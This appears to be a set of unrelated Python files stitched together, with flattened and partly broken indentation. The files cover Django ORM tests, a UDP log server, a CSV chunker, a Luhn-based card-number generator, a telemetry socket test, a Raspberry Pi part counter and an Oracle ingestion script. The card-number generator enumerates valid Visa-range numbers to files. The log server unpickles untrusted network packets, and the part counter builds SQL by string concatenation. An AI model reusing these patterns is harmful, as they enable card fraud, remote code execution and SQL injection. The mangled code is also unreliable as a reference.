self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a)
self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a)
def test_equal_lookup(self):
# The "__exact" lookup type can be omitted, as a shortcut.
self.assertEqual(Article.objects.get(id=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline='Area woman programs in Python'), self.a)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005),
['<Article: Area woman programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2004),
[],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005, pub_date__month=7),
['<Article: Area woman programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=5),
['<Article: Area woman programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=6),
[],
)
def test_does_not_exist(self):
# Django raises an Article.DoesNotExist exception for get() if the
# parameters don't match any object.
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
id__exact=2000,
)
# To avoid dict-ordering related errors check only one lookup
# in single assert.
self.assertRaises(
ObjectDoesNotExist,
Article.objects.get,
pub_date__year=2005,
pub_date__month=8,
)
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
pub_date__week_day=6,
)
def test_lookup_by_primary_key(self):
# Lookup by a primary key is the most common case, so Django
# provides a shortcut for primary-key exact lookups.
# The following is identical to articles.get(id=a.id).
self.assertEqual(Article.objects.get(pk=self.a.id), self.a)
# pk can be used as a shortcut for the primary key name in any query.
self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]),
["<Article: Area woman programs in Python>"])
# Model instances of the same type and same ID are considered equal.
a = Article.objects.get(pk=self.a.id)
b = Article.objects.get(pk=self.a.id)
self.assertEqual(a, b)
def test_too_many(self):
# Create a very similar object
a = Article(
id=None,
headline='Area man programs in Python',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.count(), 2)
# Django raises an Article.MultipleObjectsReturned exception if the
# lookup matches more than one object
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
headline__startswith='Area',
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
pub_date__month=7,
)
class ConcurrentSaveTests(TransactionTestCase):
available_apps = ['basic']
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_concurrent_delete_with_save(self):
"""
Test fetching, deleting and finally saving an object - we should get
an insert in this case.
"""
a = Article.objects.create(headline='foo', pub_date=datetime.now())
exceptions = []
def deleter():
try:
# Do not delete a directly - doing so alters its state.
Article.objects.filter(pk=a.pk).delete()
except Exception as e:
exceptions.append(e)
finally:
connections[DEFAULT_DB_ALIAS].close()
self.assertEqual(len(exceptions), 0)
t = threading.Thread(target=deleter)
t.start()
t.join()
a.save()
self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo')
class ManagerTest(TestCase):
QUERYSET_PROXY_METHODS = [
'none',
'count',
'dates',
'datetimes',
'distinct',
'extra',
'get',
'get_or_create',
'update_or_create',
'create',
'bulk_create',
'filter',
'aggregate',
'annotate',
'complex_filter',
'exclude',
'in_bulk',
'iterator',
'earliest',
'latest',
'first',
'last',
'order_by',
'select_for_update',
'select_related',
'prefetch_related',
'values',
'values_list',
'update',
'reverse',
'defer',
'only',
'using',
'exists',
'_insert',
'_update',
'raw',
]
def test_manager_methods(self):
"""
This test ensures that the correct set of methods from `QuerySet`
are copied onto `Manager`.
It's particularly useful to prevent accidentally leaking new methods
into `Manager`. New `QuerySet` methods that should also be copied onto
`Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`.
"""
self.assertEqual(
sorted(BaseManager._get_queryset_methods(QuerySet).keys()),
sorted(self.QUERYSET_PROXY_METHODS),
)
class SelectOnSaveTests(TestCase):
def test_select_on_save(self):
a1 = Article.objects.create(pub_date=datetime.now())
with self.assertNumQueries(1):
a1.save()
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(2):
asos.save()
with self.assertNumQueries(1):
asos.save(force_update=True)
Article.objects.all().delete()
with self.assertRaises(DatabaseError):
with self.assertNumQueries(1):
asos.save(force_update=True)
def test_select_on_save_lying_update(self):
"""
Test that select_on_save works correctly if the database
doesn't return correct information about matched rows from
UPDATE.
"""
        # Change the manager to not return "row matched" for update().
        # We are going to change the Article's _base_manager class
        # dynamically. This is a bit of a hack, but it seems hard to
        # test this properly otherwise. We patch Article's manager (not
        # ArticleSelectOnSave's) because proxy models use their parent
        # model's _base_manager.
orig_class = Article._base_manager.__class__
class FakeQuerySet(QuerySet):
# Make sure the _update method below is in fact called.
called = False
def _update(self, *args, **kwargs):
FakeQuerySet.called = True
super(FakeQuerySet, self)._update(*args, **kwargs)
return 0
class FakeManager(orig_class):
def get_queryset(self):
return FakeQuerySet(self.model)
try:
Article._base_manager.__class__ = FakeManager
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(3):
asos.save()
self.assertTrue(FakeQuerySet.called)
# This is not wanted behavior, but this is how Django has always
# behaved for databases that do not return correct information
# about matched rows for UPDATE.
with self.assertRaises(DatabaseError):
asos.save(force_update=True)
with self.assertRaises(DatabaseError):
asos.save(update_fields=['pub_date'])
finally:
Article._base_manager.__class__ = orig_class
class ModelRefreshTests(TestCase):
def _truncate_ms(self, val):
# MySQL < 5.6.4 removes microseconds from the datetimes which can cause
# problems when comparing the original value to that loaded from DB
return val - timedelta(microseconds=val.microsecond)
def test_refresh(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.filter(pk=a.pk).update(headline='new headline')
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.headline, 'new headline')
orig_pub_date = a.pub_date
new_pub_date = a.pub_date + timedelta(10)
Article.objects.update(headline='new headline 2', pub_date=new_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db(fields=['headline'])
self.assertEqual(a.headline, 'new headline 2')
self.assertEqual(a.pub_date, orig_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.pub_date, new_pub_date)
def test_refresh_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create()
s3 = SelfRef.objects.create(selfref=s1)
s3_copy = SelfRef.objects.get(pk=s3.pk)
s3_copy.selfref.touched = True
s3.selfref = s2
s3.save()
with self.assertNumQueries(1):
s3_copy.refresh_from_db()
with self.assertNumQueries(1):
# The old related instance was thrown away (the selfref_id has
# changed). It needs to be reloaded on access, so one query
# executed.
self.assertFalse(hasattr(s3_copy.selfref, 'touched'))
self.assertEqual(s3_copy.selfref, s2)
def test_refresh_null_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create(selfref=s1)
s2.selfref = None
s2.refresh_from_db()
self.assertEqual(s2.selfref, s1)
def test_refresh_unsaved(self):
pub_date = self._truncate_ms(datetime.now())
a = Article.objects.create(pub_date=pub_date)
a2 = Article(id=a.pk)
with self.assertNumQueries(1):
a2.refresh_from_db()
self.assertEqual(a2.pub_date, pub_date)
self.assertEqual(a2._state.db, "default")
def test_refresh_no_fields(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
with self.assertNumQueries(0):
a.refresh_from_db(fields=[])
class TestRelatedObjectDeprecation(TestCase):
def test_field_related_deprecation(self):
field = SelfRef._meta.get_field('selfref')
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter('always')
self.assertIsInstance(field.related, ForeignObjectRel)
self.assertEqual(len(warns), 1)
self.assertEqual(
str(warns.pop().message),
'Usage of field.related has been deprecated. Use field.rel instead.'
)
|
log_server.py
|
#!/usr/bin/env python3
'''
A UDP logging server.
Received messages are written to sys.stdout and a file. It exits gracefully on
SIGINT (Ctrl+C) signal.
Note: it runs only on Python>=3.6.
'''
import os
import sys
import signal
import pickle
import logging
import threading
import socketserver
LOG_SERVER_HOST = '0.0.0.0'
LOG_SERVER_PORT = int(os.getenv(
'LOG_SERVER_PORT',
default='60000'
))
LOG_FILENAME = 'udp_server.log'
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler(filename=LOG_FILENAME, mode='w')
ch = logging.StreamHandler(stream=sys.stdout)
fh.setLevel(logging.DEBUG)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'[%(asctime)s:%(levelname)s:%(hostname)s:P%(process)d'
':%(filename)s:%(lineno)d:%(funcName)s()]'
': %(message)s'
)
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
class LogRecordUDPHandler(socketserver.DatagramRequestHandler):
def handle(self):
obj = pickle.loads(self.packet[4:])
record = logging.makeLogRecord(obj)
logger.handle(record)
class LogRecordUDPServer(socketserver.UDPServer):
def __init__(self, *args, **kwargs):
signal.signal(signal.SIGINT, self.signal_sigint_handler)
signal.signal(signal.SIGTERM, self.signal_sigint_handler)
super().__init__(*args, **kwargs)
def signal_sigint_handler(self, sig, frame):
print('Ctrl+C pressed! Terminating...')
self.shutdown()
def run(self,):
# in order to call self.shutdown(), self.serve_forever() needs to be
# running on a separate thread to avoid a deadlock, as per
# socketserver.BaseServer.shutdown() docstring
t = threading.Thread(target=self.serve_forever)
t.start()
t.join()
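# --- Hedged usage sketch (added for illustration; not part of the original server) ---
# A client can forward records to this server with the standard library's
# logging.handlers.DatagramHandler, which pickles each LogRecord and prefixes it
# with a 4-byte length header (hence the self.packet[4:] slice in the handler).
# The formatter above expects a 'hostname' attribute, so the client supplies one
# via `extra=`; the host/port values below are assumptions.
def _example_client(host='127.0.0.1', port=LOG_SERVER_PORT):
    import logging.handlers
    client_logger = logging.getLogger('udp_client_example')
    client_logger.setLevel(logging.DEBUG)
    client_logger.addHandler(logging.handlers.DatagramHandler(host, port))
    client_logger.info('hello from the client', extra={'hostname': 'example-host'})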
if __name__ == '__main__':
print('Running log server on {}:{}. Press Ctrl+C to exit.'.format(
LOG_SERVER_HOST, LOG_SERVER_PORT
))
addr = (LOG_SERVER_HOST, LOG_SERVER_PORT)
with LogRecordUDPServer(addr, LogRecordUDPHandler) as server:
server.run()
|
data_io_chunks.py
|
import itertools
import multiprocessing
from csv import DictReader, DictWriter
from multiprocessing import Queue
STOP = 1
def grouper(n, iterable):
it = iter(iterable)
while True:
chunk = tuple(itertools.islice(it, n))
if not chunk:
return
yield chunk
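# Hedged example (illustrative only):
#   list(grouper(2, 'abcde')) == [('a', 'b'), ('c', 'd'), ('e',)]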
class DataIOChunks:
    def __init__(self):
        self.reader_queue = multiprocessing.Queue(maxsize=10)
        # keep handles to the worker processes so process() can join them later
        self.reader_process = multiprocessing.Process(target=self.csv_reader, args=(self.reader_queue,))
        self.reader_process.start()
        self.writer_queue = multiprocessing.Queue(maxsize=10)
        self.writer_process = multiprocessing.Process(target=self.csv_writer, args=(self.writer_queue,))
        self.writer_process.start()
    def process(self, process_chunk_func):
        while True:
            chunk = self.reader_queue.get()
            if chunk == STOP:
                break
            print("Chunk size", len(chunk))
            new_ch = process_chunk_func(chunk)
            self.writer_queue.put(new_ch)
        # tell the writer that no more chunks are coming, then wait for both
        # worker processes to exit (multiprocessing.Queue has no join() method)
        self.writer_queue.put(STOP)
        self.reader_process.join()
        self.writer_process.join()
def csv_writer(self, queue: Queue):
with open("../../../data/events_sorted_trans.csv", "wt") as out:
first_row = True
while True:
output_obs = queue.get()
if output_obs == STOP:
break
if first_row:
dw = DictWriter(out, fieldnames=output_obs[0].keys())
dw.writeheader()
first_row = False
dw.writerows(output_obs)
def csv_reader(self, queue: Queue, chunk_size=10000, limit=None):
with open("../../../data/events_sorted.csv") as inp:
dr = DictReader(inp)
print("Reading rows")
for ch in grouper(chunk_size, dr):
queue.put(ch)
queue.put(STOP)
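# --- Hedged usage sketch (illustrative only; the transform below is an assumption) ---
def _example_upper_case_chunk(chunk):
    # chunk is a tuple of csv.DictReader rows; return the processed rows
    return [{key: str(value).upper() for key, value in row.items()} for row in chunk]

# The hard-coded CSV paths above must exist before running:
# if __name__ == '__main__':
#     DataIOChunks().process(_example_upper_case_chunk)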
|
main.py
|
# import required libraries
import logging
import threading
import time
#ask the user how many threads to run
while True:
try:
threadAmount = int(input("How many Threads? (1-8): "))
break
except:
print("Enter a number stupid")
#define the number generating thread
def thread_function(index):
    logging.info("Thread %s: starting", index)
    # defines how to check if the card is valid using the Luhn algorithm
def checkLuhn(cardNo):
nDigits = len(cardNo)
nSum = 0
isSecond = False
for i in range(nDigits - 1, -1, -1):
d = ord(cardNo[i]) - ord('0')
if isSecond:
d = d * 2
# We add two digits to handle
# cases that make two digits after
# doubling
nSum += d // 10
nSum += d % 10
isSecond = not isSecond
return (nSum % 10 == 0)
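    # Hedged example (illustrative only): checkLuhn("4532015112830366") is True,
    # while checkLuhn("4532015112830367") is False.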
def listtostring(s):
str1 = ""
for ele in s:
str1 += ele
return str1
cardNoArr = []
counter = 0
counter2 = 0
#defines what ranges to use for each thread
ave1 = [4000000000000000,4125000000000000,4250000000000000,4375000000000000,4500000000000000,4625000000000000,4750000000000000,4875000000000000]
ave2 = [4125000000000000,4250000000000000,4375000000000000,4500000000000000,4625000000000000,4750000000000000,4875000000000000,5000000000000000]
f = open("cards{}.txt".format(index), "a+")
f.close()
f = open("cards{}.txt".format(index), "r")
#defines the start and endpoint of this particular thread by getting it from the array using the index variable
lines = f.read().splitlines()
    try:
        # resume from the last card number this thread previously saved
        lastline = lines[-2]
        startN = int(lastline)
    except:
        startN = int(ave1[index])
    endN = int(ave2[index])
logging.info("Thread {0}: Start: {1}".format(index,startN))
logging.info("Thread {0}: End: {1}".format(index,endN))
#opens the cardfile for this particular thread
cardfile = open("cards{}.txt".format(index), "a+")
#starts to check card numbers using the range provided in startN and endN
for cardNoint, _ in enumerate(range(startN,endN), start=startN):
cardNo = str(cardNoint)
if (checkLuhn(cardNo)):
counter += 1
if counter < 10000:
cardNoArr.append(cardNo)
cardNoArr.append("\n")
else:
cardfile.write(listtostring(cardNoArr))
cardNoArr = []
#logs when thread finishes
logging.info("Thread %s: finished",index)
if __name__ == "__main__":
#sets up some logging stuff
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
#runs the amount of threads defined by threadAmount
threads = []
for index in range(threadAmount):
logging.info("Main : create and start thread %d.", index)
x = threading.Thread(target=thread_function, args=(index,))
threads.append(x)
x.start()
time.sleep(1)
|
test_socket.py
|
import queue
import socket
import threading
import unittest
import racetools.errors
import racetools.telemetry.pcars.udp as pcars_udp
class Socket(pcars_udp.Socket):
def __init__(self):
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self._socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
def close(self) -> None:
self._socket.close()
def send(self, packet: bytes) -> None:
self._socket.sendto(packet, ('127.0.0.1', pcars_udp.PORT))
class TestSocket(unittest.TestCase):
def setUp(self) -> None:
self._terminate_thread = threading.Event()
self._socket = Socket()
self.packets = queue.Queue()
self._thread = threading.Thread(target=self._send_packet)
self._thread.start()
def tearDown(self) -> None:
self._terminate_thread.set()
self._thread.join()
self._socket.close()
def _send_packet(self):
while not self._terminate_thread.is_set():
try:
packet = self.packets.get(timeout=0.01)
if packet:
self._socket.send(packet)
self.packets.task_done()
except queue.Empty:
continue
def test_valid_packets(self):
with pcars_udp.Socket() as udp_socket:
self.packets.put(pcars_udp.TelemetryData(
base=pcars_udp.PacketBase(
packet_type=pcars_udp.TelemetryData.TYPE,
packet_version=pcars_udp.TelemetryData.VERSION,
partial_packet_index=1,
partial_packet_number=1),
speed=123.45))
self.packets.put(pcars_udp.GameStateData(
base=pcars_udp.PacketBase(
packet_type=pcars_udp.GameStateData.TYPE,
packet_version=pcars_udp.GameStateData.VERSION,
partial_packet_index=1,
partial_packet_number=1),
track_temperature=25))
self.assertAlmostEqual(123.45, udp_socket.receive().speed, places=3)
self.assertEqual(25, udp_socket.receive().track_temperature)
def test_invalid_packet(self):
with pcars_udp.Socket() as udp_socket:
self.packets.put(bytes(500))
with self.assertRaises(racetools.errors.UnrecognisedPacketType):
udp_socket.receive()
def test_timeout(self):
with pcars_udp.Socket(timeout=0.01) as udp_socket:
with self.assertRaises(racetools.errors.Timeout):
udp_socket.receive()
|
autoprn1.py
|
"""
Project_name: AUTO PRN PROJECT
Author: Rakesh Ranjan Jena
Dept: IMS
Company: BEST KOKI AUTOMOTIVE PVT. LTD.
Start Date:02.03.2021
Implement Date:
End Date:
DESCRIPTION:
This project is for automatic counting of OK/NG parts, with cycle time, from each and every machine.
This is an IIoT project to monitor the productivity of machines and processes through cycle time and OK/NG counts.
This project is applicable where PLC communication is not possible, the PLC is older, or the PLC is unable to send data to a server.
"""
#IMPORTING LIBRARY
import threading
#GTK Library
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GObject,GLib
#DATE and TIME Library
import datetime
from datetime import datetime
import time
import pytz
from datetime import timedelta
#DB API LIBRARY
import sqlite3
from sqlite3 import Error
#Rpi GPIO
import RPi.GPIO as GPIO
#URL LIBRARY
import urllib3
http = urllib3.PoolManager()
from gi.repository import Gtk
app_path="/home/pi/autoprn/"
database = app_path+"autoprn.db"
class Handler:
def onDestroy(self, *args):
Gtk.main_quit()
# GLOBAL VARIABLES
device_id="BK-IMS-2021-DEV100"
device_time_stamp=datetime.now()
#variable Declaration For Timer Operation
start_count_signal=0
#GPIO Operation VARIABLES
OK=0
NG=0
model=""
remark=""
now = datetime.now(tz=pytz.timezone('Asia/Kolkata'))
device_time_stamp=(str(now.strftime('%Y-%m-%d %H:%M:%S-%f')))
device_date=(str(now.strftime('%Y-%m-%d')))
device_time=(str(now.strftime('%H:%M:%S')))
#DB CONNECTION
def create_connection(db_file):
conn = None
try:
conn = sqlite3.connect(db_file)
except Error as e:
print(e)
return conn
#Update Model DB
def update_model_from_server():
global database
payload = {'process_name': 'SHAFT GRINDING'}
url = 'http://192.168.3.19/eol/module/autoprn/API/getModel.php'
try:
req = http.request('GET', url, fields=payload)
except ConnectionError:
        raise Exception('Unable to get model updates from server: connection error.')
model=req.data.decode('utf-8')
model=model.rstrip()
model=model.lstrip()
model=model.split(',')
#model=''.join(model).split()
#print(model[0])
for part in model:
if part!='':
try:
conn = create_connection(database)
command="SELECT part_name from model WHERE part_name='"+str(part)+"'"
#print(command)
cursor = conn.execute(command)
if cursor.fetchone():
print("Already Exist!")
else:
print("Part Not found with name: "+part)
command="INSERT INTO model(part_name) VALUES ('"+str(part)+"')"
#print(command)
conn.execute(command)
conn.commit()
except sqlite3.Error as er:
print("SQL ERROR"+str(er))
finally:
print("Model Updated")
conn.close()
#UPDATE MODEL CALL
update_model_from_server()
#DB OPERATIONS
def update_data_db():
global model
global OK
global NG
global device_time_stamp
global device_date
global device_time
global database
#last_data_db_ok=0
#last_data_db_ng=0
#last_data_db_date=""
if not (model == None or model == ''):
try:
conn = create_connection(database)
command="SELECT * FROM data WHERE model='"+str(model)+"' AND date='"+str(device_date)+"'"
#print(command)
cursor = conn.execute(command)
data_1=cursor.fetchall()
if len(data_1)>0:
for row in data_1:
#last_data_db_date=str(row[1])
last_data_db_ok=int(row[4])
last_data_db_ng=int(row[5])
print(last_data_db_ok,last_data_db_ng)
if OK<last_data_db_ok or NG<last_data_db_ng:
#NEW DATA ADDED
OK+=last_data_db_ok
NG+=last_data_db_ng
print("Data Updated")
command="UPDATE data SET date='"+device_date+"',time='"+device_time+"',OK="+str(OK)+",NG="+str(NG)+",time_stamp='"+str(device_time_stamp)+"',sync=0 WHERE model='"+str(model)+"' AND date='"+str(device_date)+"'"
#print(command)
#conn.commit()
else:
print("Part Model found with name, New Addition: "+model)
command="INSERT INTO data(date,time,model,OK,NG,time_stamp,sync) VALUES ('"+device_date+"','"+device_time+"','"+str(model)+"',"+str(OK)+","+str(NG)+",'"+str(device_time_stamp)+"',0)"
#print(command)
conn.execute(command)
conn.commit()
except sqlite3.Error as er:
print("SQL ERROR"+str(er))
finally:
conn.commit()
print("Data Updated")
conn.close()
def create_historian_data():
global prev_OK
global prev_NG
global model
global OK
global NG
global device_time_stamp
global device_date
global device_time
global database
global duration_in_s
global idle_time_in_sec
global remark
if not ((OK == prev_OK and NG == prev_NG) or (model == None or model == '')):
try:
conn = create_connection(database)
command="INSERT INTO historian(model,date,time,OK,NG,time_stamp,cycle_time,idle_time,remark) VALUES ('"+str(device_date)+"','"+str(device_time)+"','"+str(model)+"',"+str(OK)+","+str(NG)+",'"+str(device_time_stamp)+"','"+str(duration_in_s)+"',"+str(idle_time_in_sec)+",'"+str(remark)+"')"
#print(command)
conn.execute(command)
conn.commit()
except sqlite3.Error as er:
print("SQL ERROR"+str(er))
finally:
print("History Updated")
conn.close()
prev_OK=OK
prev_NG=NG
idle_time_in_sec=0
else:
print("Same Data")
def main():
global database
database = app_path+"autoprn.db"
conn = create_connection(database)
builder = Gtk.Builder()
builder.add_from_file(app_path+"autoprn.glade")
builder.connect_signals(Handler())
#GET GUI Objects
date_label= builder.get_object("date_label")
shift_label= builder.get_object("shift_label")
model_box= builder.get_object("model_box")
count_btn= builder.get_object("count_btn")
OK_label= builder.get_object("OK_label")
NG_label= builder.get_object("NG_label")
#Sensor Labels
inp1_label= builder.get_object("inp1_label")
inp2_label= builder.get_object("inp2_label")
inp3_label= builder.get_object("inp3_label")
inp4_label= builder.get_object("inp4_label")
inp5_label= builder.get_object("inp5_label")
inp6_label= builder.get_object("inp6_label")
#OUTPUT Label
out1_label= builder.get_object("out1_label")
out2_label= builder.get_object("out2_label")
#Target and Completed Label
target_label= builder.get_object("target_label")
completed_label= builder.get_object("completed_label")
device_id_label= builder.get_object("device_id_label")
info_label= builder.get_object("info_label")
cycle_time_label= builder.get_object("cycle_time_label")
idle_time_label= builder.get_object("idle_time_label")
btn_man=builder.get_object("btn_man")
btn_machine=builder.get_object("btn_machine")
btn_material=builder.get_object("btn_material")
btn_method=builder.get_object("btn_method")
def update_model_data():
try:
conn = sqlite3.connect(database)
command="SELECT part_name from model"
#print(command)
cursor = conn.execute(command)
for row in cursor:
model_box.append_text(row[0])
except sqlite3.Error as er:
print("SQL ERROR"+str(er))
finally:
print("Model Updated")
conn.close()
update_model_data()
def get_device_id():
sql=""
data=""
cur = conn.cursor()
cur.execute(sql, data)
conn.commit()
def update_local_time():
global device_time_stamp
global device_date
global device_time
now = datetime.now(tz=pytz.timezone('Asia/Kolkata'))
date_label.set_text(str(now.strftime('%B %d, %Y %H:%M:%S')))
device_time_stamp=(str(now.strftime('%Y-%m-%d %H:%M:%S-%f')))
device_date=(str(now.strftime('%Y-%m-%d')))
device_time=(str(now.strftime('%H:%M:%S')))
#print(device_time_stamp)
def update_data_model(self):
global model
global OK
global NG
OK=0
NG=0
model=model_box.get_active_text()
#if start_count_signal==1:
info_label.set_text("Selected Part: " + str(model))
if model==None:
start_count_signal=0
else:
start_count_signal=1
print(start_count_signal)
count_btn.connect("clicked",update_data_model)
    # Set OK and NG to 0 if no model is selected, then refresh the UI labels
def update_data():
global OK
global NG
global model
global in1
global in3
if model==None or model=="":
OK=0
NG=0
OK_label.set_text(str(OK))
NG_label.set_text(str(NG))
inp1_label.set_text(str(in1))
inp2_label.set_text(str(in3))
#print("Hello WORLD 1")
def update_cycle_time():
        global idle_time_in_sec
global duration_in_s
idle_time_label.set_text(str(idle_time_in_sec))
cycle_time_label.set_text(str(duration_in_s))
def main_target():
global prev_OK
global prev_NG
global OK
global NG
global idle_time_in_sec
global duration_in_s
global in1
global in3
prev_OK=0
prev_NG=0
idle_time_in_sec=0
duration_in_s=0
input_pin1=16
input_pin2=12
input_pin3=26
output_pin1=20
output_pin2=21
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(input_pin1, GPIO.IN)
GPIO.setup(input_pin2, GPIO.IN)
GPIO.setup(input_pin3, GPIO.IN)
GPIO.setup(output_pin1, GPIO.OUT)
GPIO.setup(output_pin2, GPIO.OUT)
while True:
duration_in_sec=0
idle_count_flag=0
idle_time_start=datetime.now()
            #sensor and pin configuration variables, I/O pin variables
d1=0
d0=0
in1=GPIO.input(input_pin1)
in2=GPIO.input(input_pin2)
in3=GPIO.input(input_pin3)
            #Monitor sensor value loop
while in1==0:
#start Cycle Time Count
if idle_count_flag==0:
idle_count_flag=1
first_time = datetime.now()
print("OK Loop")
in1=GPIO.input(input_pin1)
in3=GPIO.input(input_pin3)
if in1==1:
OK+=1
if in3==0:
d0+=1
if in3==1:
if d0>=1:
NG+=1
d0=0
print("d0:"+str(d0))
print(OK, NG)
while in3==0:
if idle_count_flag==0:
idle_count_flag=1
first_time = datetime.now()
print("In NG Loop")
in3=GPIO.input(input_pin3)
in1=GPIO.input(input_pin1)
if in3==1:
NG+=1
if in1==0:
d1+=1
if in1==1:
if d1>=1:
OK+=1
d1=0
print("d1:"+str(d1))
print(OK, NG)
print(model,OK, NG)
            #if model != None and model != "":
print(in1,in3)
print(prev_OK,prev_NG)
#time.sleep(1)
#GLib.idle_add()
later_time = datetime.now()
if idle_count_flag==0:
difference=0
duration_in_sec=0
difference = later_time-idle_time_start
duration_in_sec = float(difference.total_seconds())*10
idle_time_in_sec += round(duration_in_sec,4)
#idle_time_in_sec=idle_time_in_sec
print("Idle Time"+str(idle_time_in_sec))
else:
difference = later_time - first_time
duration_in_s = float(difference.total_seconds())
print("Cycle Time"+ str(duration_in_s))
create_historian_data()
update_data_db()
#idle_time_in_sec=0
GLib.idle_add(update_cycle_time)
GLib.idle_add(update_data)
GLib.idle_add(update_local_time)
#GLib.idle_add(update_data_db)
#difference = later_time - first_time
time.sleep(0.01)
GPIO.cleanup()
thread = threading.Thread(target=main_target)
thread.daemon = True
thread.start()
#update Date and Time
window = builder.get_object("window1")
window.fullscreen()
window.show_all()
window.connect("destroy", Gtk.main_quit)
#GObject.timeout_add(100, print("Hello"))
Gtk.main()
if __name__ == '__main__':
main()
|
processRecords (3).py
|
#!/bin/python
# -*- coding: utf-8 -*-
# $Author: stevedrewe $
# $Date: 2016-12-16 14:34:16 +0000 (Fri, 16 Dec 2016) $
# $URL: http://svn.avox.national/svn/scripts/branches/TAS-544/linux/avoxpdb1/avoxuser/python2/data_ingestion/postToEndpoint.py $
# $Rev: 3107 $
# Standard Modules
import random
import sys
import base64
import datetime
import time
import os.path
import requests
import json
import cx_Oracle
from requests.auth import HTTPBasicAuth
from multiprocessing import Process, Queue, current_process
# Custom Modules
import localEnv
import avoxUtils
from automationError import ParameterError, CountryError
import dataIngestDefn
# Set HTTP header to Send/Accept json
HEADERS = {"Content-Type": "application/json", "Accept": "application/json"}
def worker(taskqueue, returnqueue):
# Entry point for worker processes
for func, args in iter(taskqueue.get, 'STOP'):
print "in worker", current_process().name, func.__name__
result = func(*args)
returnqueue.put(result, True)
# Add small time delay to allow unix pipe to sync before next iteration
time.sleep(0.1)
def posttoendpoint(cr_id, ep, parameters):
# REST POST Function
print cr_id, ep
rs = requests.session()
rs.headers = HEADERS
try:
# rs.auth = HTTPBasicAuth(localEnv.kfUser, base64.b64decode(localEnv.kfUserPwd))
rs = requests.post(ep, headers=HEADERS, data=parameters, timeout=dataIngestDefn.httpTimeout,
auth=HTTPBasicAuth(localEnv.kfUser, base64.b64decode(localEnv.kfUserPwd)))
restret = (cr_id, rs.status_code, ep, parameters)
# time.sleep(100*random.random())
# restret = (cr_id, 200, ep, parameters)
except requests.Timeout, rte:
restret = (cr_id, 504, ep, rte)
except Exception, re_:
restret = (cr_id, 500, ep, re_)
finally:
rs.close()
return restret
def insertLog(con, rows):
ins_csr = con.cursor()
ins_csr.prepare(" INSERT INTO entity_process_log \
(cr_id,event_code,status_code,event_timestamp,user_id,program_name,record_creation_ts,process_type,ovn,created_by, \
epi_id, event_outcome, outcome_detail) \
VALUES \
(:1, :2, :3, :4, :5, :6, :7, :8, :9, :10,:11,:12,:13)")
ins_csr.executemany(None, rows)
con.commit()
ins_csr.close()
def updateProcessed(con, rows):
upd_csr = con.cursor()
# Set record to processed in the propagate table
upd_csr.prepare(" UPDATE entity_propagate_internal \
SET processed = 'Y', record_processed_ts = systimestamp \
WHERE cr_id = :1 \
AND process_type = :2 \
AND processed = 'N'")
upd_csr.executemany(None, rows)
# Remove record from Data Ingestion Pot so it isn't processed again
#upd_csr = con.cursor()
upd_csr.prepare(" UPDATE era_queues \
SET staff_id = (SELECT ID FROM staff WHERE username = 'SOutput') \
WHERE cr_id = :1")
rows = [(x[0],) for x in rows]
upd_csr.executemany(None, rows)
con.commit()
upd_csr.close()
#
# Start of the main processing script
#
# Check for process lock file, if found exit
if os.path.isfile(dataIngestDefn.lockFile):
avoxUtils.sendMail(localEnv.recipient, str(localEnv.tnsname) + "Data Ingestion skipped",
"Lock file found. Data Ingestion Run skipped.")
sys.exit(0)
# Set the environment
#avoxUtils.setvars("")
starttime = datetime.datetime.now()
avoxUtils.jobctl(dataIngestDefn.pType, 'START')
# Write a lock file to cater for kofax taking longer than cron time to process the data
lckFile = open(dataIngestDefn.lockFile, 'w')
lckFile.write("Running.")
lckFile.close()
rowcount = 0
commitunit = avoxUtils.fetchArraySize()
fnTime = datetime.datetime.now().strftime("%d%m%Y%H%M%S")
